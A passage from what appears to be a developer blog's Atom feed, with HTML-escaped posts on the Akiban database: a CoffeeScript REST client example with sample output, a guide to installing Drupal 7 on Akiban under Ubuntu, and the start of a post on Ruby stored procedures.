    &lt;span class='nx'&gt;unless&lt;/span&gt; &lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='p'&gt;].&lt;/span&gt;&lt;span class='nx'&gt;error&lt;/span&gt;
      &lt;span class='nx'&gt;_&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='p'&gt;].&lt;/span&gt;&lt;span class='nx'&gt;body&lt;/span&gt;&lt;span class='p'&gt;).&lt;/span&gt;&lt;span class='nx'&gt;forEach&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='o'&gt;-&amp;gt;&lt;/span&gt;
        &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='k'&gt;if&lt;/span&gt; &lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='p'&gt;].&lt;/span&gt;&lt;span class='nx'&gt;error&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;--------&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;

&lt;span class='nx'&gt;x&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='k'&gt;new&lt;/span&gt; &lt;span class='nx'&gt;ak&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;AkibanClient&lt;/span&gt;&lt;span class='p'&gt;()&lt;/span&gt;

&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;version&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;the server version is&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;))&lt;/span&gt;
&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;schemata&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;and these are all the schemata&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;))&lt;/span&gt;
&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;groups&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;drupal&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;all groups in the drupal schema&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The above can be run with the &lt;code&gt;coffee&lt;/code&gt; command like so: &lt;code&gt;coffee
drupal.coffee&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;To retrieve a certain node with this client, the code would look like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='js'&gt;&lt;span class='err'&gt;#&lt;/span&gt;&lt;span class='o'&gt;!&lt;/span&gt;&lt;span class='err'&gt;/usr/bin/env coffee&lt;/span&gt;

&lt;span class='nx'&gt;ak&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='nx'&gt;require&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;./lib/akiban_rest.js&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
&lt;span class='nx'&gt;_&lt;/span&gt;  &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='nx'&gt;require&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;underscore&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;

&lt;span class='nx'&gt;log&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;msg&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='o'&gt;-&amp;gt;&lt;/span&gt;
  &lt;span class='p'&gt;()&lt;/span&gt; &lt;span class='o'&gt;-&amp;gt;&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;========&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;msg&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;--------&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='nx'&gt;unless&lt;/span&gt; &lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='p'&gt;].&lt;/span&gt;&lt;span class='nx'&gt;error&lt;/span&gt;
      &lt;span class='nx'&gt;_&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='p'&gt;].&lt;/span&gt;&lt;span class='nx'&gt;body&lt;/span&gt;&lt;span class='p'&gt;).&lt;/span&gt;&lt;span class='nx'&gt;forEach&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='o'&gt;-&amp;gt;&lt;/span&gt;
        &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='k'&gt;if&lt;/span&gt; &lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='p'&gt;].&lt;/span&gt;&lt;span class='nx'&gt;error&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;--------&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;

&lt;span class='nx'&gt;x&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='k'&gt;new&lt;/span&gt; &lt;span class='nx'&gt;ak&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;AkibanClient&lt;/span&gt;&lt;span class='p'&gt;()&lt;/span&gt;
&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;get&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;drupal&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;node&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='mi'&gt;2054&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;res&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='o'&gt;-&amp;gt;&lt;/span&gt; &lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;retrieving nid 2054&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;)(&lt;/span&gt;&lt;span class='nx'&gt;res&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Running the above example results in output like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;$&lt;/span&gt; coffee drupal.coffee 
&lt;span class='go'&gt;========&lt;/span&gt;
&lt;span class='go'&gt;retrieving nid 2054&lt;/span&gt;
&lt;span class='go'&gt;--------&lt;/span&gt;
&lt;span class='go'&gt;{ nid: 2054,&lt;/span&gt;
&lt;span class='go'&gt;  vid: 2054,&lt;/span&gt;
&lt;span class='go'&gt;  type: &amp;#39;page&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;  language: &amp;#39;und&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;  title: &amp;#39;Eros Iriure Pertineo Refoveo Roto Utrum&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;  uid: 3661,&lt;/span&gt;
&lt;span class='go'&gt;  status: 1,&lt;/span&gt;
&lt;span class='go'&gt;  created: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;  changed: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;  comment: 0,&lt;/span&gt;
&lt;span class='go'&gt;  promote: 1,&lt;/span&gt;
&lt;span class='go'&gt;  sticky: 0,&lt;/span&gt;
&lt;span class='go'&gt;  tnid: 0,&lt;/span&gt;
&lt;span class='go'&gt;  translate: 0,&lt;/span&gt;
&lt;span class='go'&gt;  &amp;#39;drupal.comment&amp;#39;: [],&lt;/span&gt;
&lt;span class='go'&gt;  &amp;#39;drupal.history&amp;#39;: [],&lt;/span&gt;
&lt;span class='go'&gt;  &amp;#39;drupal.node_access&amp;#39;: [],&lt;/span&gt;
&lt;span class='go'&gt;  &amp;#39;drupal.node_comment_statistics&amp;#39;: &lt;/span&gt;
&lt;span class='go'&gt;   [ { nid: 2054,&lt;/span&gt;
&lt;span class='go'&gt;       cid: 0,&lt;/span&gt;
&lt;span class='go'&gt;       last_comment_timestamp: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;       last_comment_name: null,&lt;/span&gt;
&lt;span class='go'&gt;       last_comment_uid: 3656,&lt;/span&gt;
&lt;span class='go'&gt;       comment_count: 0 } ],&lt;/span&gt;
&lt;span class='go'&gt;  &amp;#39;drupal.node_revision&amp;#39;: &lt;/span&gt;
&lt;span class='go'&gt;   [ { nid: 2054,&lt;/span&gt;
&lt;span class='go'&gt;       vid: 2056,&lt;/span&gt;
&lt;span class='go'&gt;       uid: 1,&lt;/span&gt;
&lt;span class='go'&gt;       title: &amp;#39;Ad Si Suscipere&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;       log: &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;       timestamp: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;       status: 1,&lt;/span&gt;
&lt;span class='go'&gt;       comment: 0,&lt;/span&gt;
&lt;span class='go'&gt;       promote: 1,&lt;/span&gt;
&lt;span class='go'&gt;       sticky: 0 } ],&lt;/span&gt;
&lt;span class='go'&gt;  &amp;#39;drupal.search_node_links&amp;#39;: [] }&lt;/span&gt;
&lt;span class='go'&gt;--------&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Thats about it for this post showing off our REST access. As usual, comments are very much welcome and feel free to ping me on &lt;a href='https://twitter.com/intent/user?screen_name=posulliv'&gt;twitter&lt;/a&gt; if you would like to learn more about Akiban.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Installing Drupal 7 with Akiban</title>
   <link href="http://posulliv.github.com/2012/12/14/drupal-7-install-akiban"/>
   <updated>2012-12-14T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2012/12/14/drupal-7-install-akiban</id>
   <content type="html">&lt;p&gt;Dries recently published a &lt;a href='http://buytaert.net/using-the-akiban-database-with-drupal'&gt;post&lt;/a&gt; highlighting some work we&amp;#8217;ve done with a particular customer in the Acquia cloud. What I wanted to cover in this post was to how to perform an installation of Akiban and get a Drupal 7 site up and running on Akiban. This post only covers a fresh installation; later posts will cover how to do migration and augmenting an existing site instead of running it entirely on Akbian.&lt;/p&gt;

&lt;p&gt;This post is specific to Ubuntu but &lt;a href='http://akiban.com/downloads'&gt;Akiban&lt;/a&gt; runs on CentOS too (as well as OSX and Windows which we have installers for). If people would like to see information specific to those platforms, please let me know in the comments.&lt;/p&gt;

&lt;p&gt;First things first, lets install Akiban!&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo apt-get install -y python-software-properties&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-key adv --keyserver keyserver.ubuntu.com --recv 0AA4244A&lt;/span&gt;
&lt;span class='go'&gt;sudo add-apt-repository &amp;quot;deb http://software.akiban.com/apt-developer/ lucid main&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get update&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get install -y akiban-server postgresql-client&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The above will automatically start the Akiban server process and half of your available memory will be allocated for the JVM heap by default. If interested in modifying any configuration options, please see our &lt;a href='http://www.akiban.com/ak-docs/admin/server/server.config.html'&gt;documention&lt;/a&gt; on how to do this.&lt;/p&gt;

&lt;p&gt;Next, we&amp;#8217;ll download Drupal 7 and install Apache along with the needed PHP database drivers for Akiban.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;wget http://ftp.drupal.org/files/projects/drupal-7.17.tar.gz&lt;/span&gt;
&lt;span class='go'&gt;tar zxvf drupal-7.17.tar.gz&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get install -y apache2 php5-pgsql php5-gd libapache2-mod-php5 php-apc&lt;/span&gt;
&lt;span class='go'&gt;sudo mkdir /var/www/drupal&lt;/span&gt;
&lt;span class='go'&gt;sudo mv drupal-7.17/* drupal-7.17/.htaccess /var/www/drupal&lt;/span&gt;
&lt;span class='go'&gt;sudo cp /var/www/drupal/sites/default/default.settings.php /var/www/drupal/sites/default/settings.php&lt;/span&gt;
&lt;span class='go'&gt;sudo chown www-data:www-data /var/www/drupal/sites/default/settings.php&lt;/span&gt;
&lt;span class='go'&gt;sudo mkdir /var/www/drupal/sites/default/files&lt;/span&gt;
&lt;span class='go'&gt;sudo chown www-data:www-data /var/www/drupal/sites/default/files/&lt;/span&gt;
&lt;span class='go'&gt;sudo service apache2 restart&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The final piece of software we need is the Akiban database module for Drupal. Right now, this module is a &lt;a href='http://drupal.org/sandbox/posulliv/1835778'&gt;sandbox project on drupal.org&lt;/a&gt; so the only way to download it is to check it out with &lt;code&gt;git&lt;/code&gt;:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo apt-get install -y git&lt;/span&gt;
&lt;span class='go'&gt;git clone http://git.drupal.org/sandbox/posulliv/1835778.git akiban&lt;/span&gt;
&lt;span class='go'&gt;cd akiban&lt;/span&gt;
&lt;span class='go'&gt;git checkout 7.x&lt;/span&gt;
&lt;span class='go'&gt;cd ../&lt;/span&gt;
&lt;span class='go'&gt;sudo cp -R akiban /var/www/drupal/includes/database/.&lt;/span&gt;
&lt;span class='go'&gt;sudo chown -R www-data:www-data /var/www/drupal/includes/database/akiban&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Notice we had to switch to the &lt;code&gt;7.x&lt;/code&gt; branch. The &lt;code&gt;master&lt;/code&gt; branch in this repository is for running the module with Drupal 8.&lt;/p&gt;

&lt;p&gt;The last thing which needs to be done is apply a tiny patch to Drupal core. This patch only avoids the creation of 2 indexes in the &lt;code&gt;menu&lt;/code&gt; module. These index defitions are not compatible with Akiban with our current release. Its likely this will be resolved in a future Akiban release and so the need for this patch will be removed:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo cp akiban/core.patch /var/www/drupal&lt;/span&gt;
&lt;span class='go'&gt;cd /var/www/drupal&lt;/span&gt;
&lt;span class='go'&gt;sudo patch -p1 &amp;lt; core.patch&lt;/span&gt;
&lt;span class='go'&gt;cd&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Drupal 7 can now be installed as you normally would. Just make sure to select Akiban as the database during installation!&lt;/p&gt;

&lt;p&gt;After installation completes successfully we want to group the tables and gather statistics for out cost-based optimizer. 2 SQL scripts are provided to achieve this. They can be run using &lt;code&gt;psql&lt;/code&gt; as so:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;psql -h localhost -p 15432 drupal -f akiban/grouping.sql&lt;/span&gt;
&lt;span class='go'&gt;psql -h localhost -p 15432 drupal -f akiban/gather_stats.sql&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The commands above assume &lt;code&gt;drupal&lt;/code&gt; is the name of schema in which Drupal was installed. That should obviously be changed to the name of the schema you specified during installation.&lt;/p&gt;

&lt;p&gt;Thats it! You now have a bare Drupal 7 site running on the Akiban database! I have some plans for more posts in the coming weeks. In particular, some things I plan on covering are how to migrate a Drupal site running on MySQL to Akiban and how to use Akiban as a query accelerator for a Drupal site similar to the use case in the &lt;a href='http://buytaert.net/using-the-akiban-database-with-drupal'&gt;post&lt;/a&gt; Dries wrote. I&amp;#8217;ll also show what is possible with the REST access that we enable straight to our database (hint: its on port 8091).&lt;/p&gt;

&lt;p&gt;If there is anything you would like more information on, please let me know in the comments or hit me up on &lt;a href='https://twitter.com/intent/user?screen_name=posulliv'&gt;twitter&lt;/a&gt; and I&amp;#8217;d be more than happy to dig in. We also have a &lt;a href='https://groups.google.com/a/akiban.com/d/forum/akiban-user)'&gt;public mailing list&lt;/a&gt; for the Akiban project and I&amp;#8217;d encourage anyone who&amp;#8217;s interested to subscribe to that list and let us know how we&amp;#8217;re doing!&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Stored Procedures in Akiban</title>
   <link href="http://posulliv.github.com/2012/11/16/stored-procs"/>
   <updated>2012-11-16T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2012/11/16/stored-procs</id>
   <content type="html">&lt;p&gt;This week, we released &lt;a href='http://akiban.com/downloads'&gt;version 1.4.3&lt;/a&gt; of Akiban. This release has a bunch of great new features and bug fixes in it. There is one new feature in this release in particular that I wanted write about today. Akiban now has a preview implementation of stored procedures!&lt;/p&gt;

&lt;p&gt;Now that may not sound too exciting in itself so please bear with me. What gets me excited about this feature is that in Akiban, we allow creation of stored procedures in a multitude of languages. Stored procedures can be implemented using:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Java&lt;/li&gt;

&lt;li&gt;Javascript&lt;/li&gt;

&lt;li&gt;Ruby&lt;/li&gt;

&lt;li&gt;Python&lt;/li&gt;

&lt;li&gt;Groovy&lt;/li&gt;

&lt;li&gt;Clojure&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;That’s a pretty nice selection! I’m going to show some examples in Ruby here and if people are interested in more examples, please let me know in the comments and I’ll be sure to whip up other examples in different languages.&lt;/p&gt;

&lt;p&gt;First things first and we need to make sure Akiban is configured to allow the creation of stored procedures in Ruby. We have a pretty simple property that controls the class path for our stored procedure scripting languages - akserver.routines.class_path. I just need to make sure that property has an absolute path to where my &lt;a href='http://jruby.org/'&gt;JRuby&lt;/a&gt; jar is installed on my system. Once that property is set in my &lt;a href='http://www.akiban.com/ak-docs/admin/server/server.properties.html'&gt;server.properties&lt;/a&gt; file, I can restart Akiban and I’m ready to go.&lt;/p&gt;

&lt;p&gt;Lets start with a simple example. I just want to call a function that prints out my name.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='no'&gt;CREATE&lt;/span&gt; &lt;span class='no'&gt;PROCEDURE&lt;/span&gt; &lt;span class='n'&gt;my_name&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;out&lt;/span&gt; &lt;span class='nb'&gt;name&lt;/span&gt; &lt;span class='no'&gt;VARCHAR&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='mi'&gt;128&lt;/span&gt;&lt;span class='p'&gt;))&lt;/span&gt;
  &lt;span class='no'&gt;LANGUAGE&lt;/span&gt; &lt;span class='n'&gt;ruby&lt;/span&gt; &lt;span class='no'&gt;PARAMETER&lt;/span&gt; &lt;span class='no'&gt;STYLE&lt;/span&gt; &lt;span class='n'&gt;variables&lt;/span&gt; &lt;span class='no'&gt;AS&lt;/span&gt; &lt;span class='vg'&gt;$$&lt;/span&gt;
    &lt;span class='nb'&gt;name&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;padraig&amp;#39;&lt;/span&gt;
&lt;span class='vg'&gt;$$&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now let’s call that stored procedure from the command line:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;test=&amp;gt; call my_name();&lt;/span&gt;
&lt;span class='go'&gt;  name   &lt;/span&gt;
&lt;span class='go'&gt;---------&lt;/span&gt;
&lt;span class='go'&gt; padraig&lt;/span&gt;
&lt;span class='go'&gt;(1 row)&lt;/span&gt;

&lt;span class='go'&gt;test=&amp;gt; &lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Success! Our hello world example is up and running.&lt;/p&gt;

&lt;p&gt;We don’t just have to return simple data types like that. We can also return ruby hashes. For example, here is a stored procedure that returns a ruby hash:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='no'&gt;CREATE&lt;/span&gt; &lt;span class='no'&gt;PROCEDURE&lt;/span&gt; &lt;span class='n'&gt;ruby_hash&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='no'&gt;IN&lt;/span&gt; &lt;span class='n'&gt;x&lt;/span&gt; &lt;span class='no'&gt;BIGINT&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='no'&gt;IN&lt;/span&gt; &lt;span class='n'&gt;y&lt;/span&gt; &lt;span class='no'&gt;DOUBLE&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='no'&gt;OUT&lt;/span&gt; &lt;span class='n'&gt;s&lt;/span&gt; &lt;span class='no'&gt;DOUBLE&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='no'&gt;OUT&lt;/span&gt; &lt;span class='nb'&gt;p&lt;/span&gt;
&lt;span class='no'&gt;DOUBLE&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
  &lt;span class='no'&gt;LANGUAGE&lt;/span&gt; &lt;span class='n'&gt;ruby&lt;/span&gt; &lt;span class='no'&gt;PARAMETER&lt;/span&gt; &lt;span class='no'&gt;STYLE&lt;/span&gt; &lt;span class='n'&gt;variables&lt;/span&gt; &lt;span class='no'&gt;AS&lt;/span&gt; &lt;span class='vg'&gt;$$&lt;/span&gt;
&lt;span class='p'&gt;{&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;p&amp;quot;&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='vg'&gt;$x&lt;/span&gt; &lt;span class='o'&gt;*&lt;/span&gt; &lt;span class='vg'&gt;$y&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;s&amp;quot;&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='vg'&gt;$x&lt;/span&gt; &lt;span class='o'&gt;+&lt;/span&gt; &lt;span class='vg'&gt;$y&lt;/span&gt; &lt;span class='p'&gt;}&lt;/span&gt;
&lt;span class='vg'&gt;$$&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Notice this example also demonstrates how to pass parameters to a stored procedure. Running the above stored procedure, we get:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;test=&amp;gt; call ruby_hash(10, 100);&lt;/span&gt;
&lt;span class='go'&gt;   s   |   p    &lt;/span&gt;
&lt;span class='go'&gt;-------+--------&lt;/span&gt;
&lt;span class='go'&gt; 110.0 | 1000.0&lt;/span&gt;
&lt;span class='go'&gt;(1 row)&lt;/span&gt;

&lt;span class='go'&gt;test=&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A common example used when demonstrating a programming language is to implement a function to compute &lt;a href='http://en.wikipedia.org/wiki/Fibonacci_number'&gt;Fibonaaci numbers&lt;/a&gt;. Hence, here is a stored procedure to do just that:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='no'&gt;CREATE&lt;/span&gt; &lt;span class='no'&gt;PROCEDURE&lt;/span&gt; &lt;span class='n'&gt;fib_r&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='no'&gt;IN&lt;/span&gt; &lt;span class='n'&gt;x&lt;/span&gt; &lt;span class='no'&gt;DOUBLE&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='no'&gt;OUT&lt;/span&gt; &lt;span class='n'&gt;s&lt;/span&gt; &lt;span class='no'&gt;DOUBLE&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
  &lt;span class='no'&gt;LANGUAGE&lt;/span&gt; &lt;span class='n'&gt;ruby&lt;/span&gt; &lt;span class='no'&gt;PARAMETER&lt;/span&gt; &lt;span class='no'&gt;STYLE&lt;/span&gt; &lt;span class='n'&gt;java&lt;/span&gt; &lt;span class='no'&gt;EXTERNAL&lt;/span&gt; &lt;span class='no'&gt;NAME&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;do_fib&amp;#39;&lt;/span&gt; &lt;span class='no'&gt;AS&lt;/span&gt; &lt;span class='vg'&gt;$$&lt;/span&gt;
    &lt;span class='k'&gt;def&lt;/span&gt; &lt;span class='nf'&gt;do_fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;x&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='n'&gt;s&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
      &lt;span class='n'&gt;s&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;x&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='k'&gt;end&lt;/span&gt;
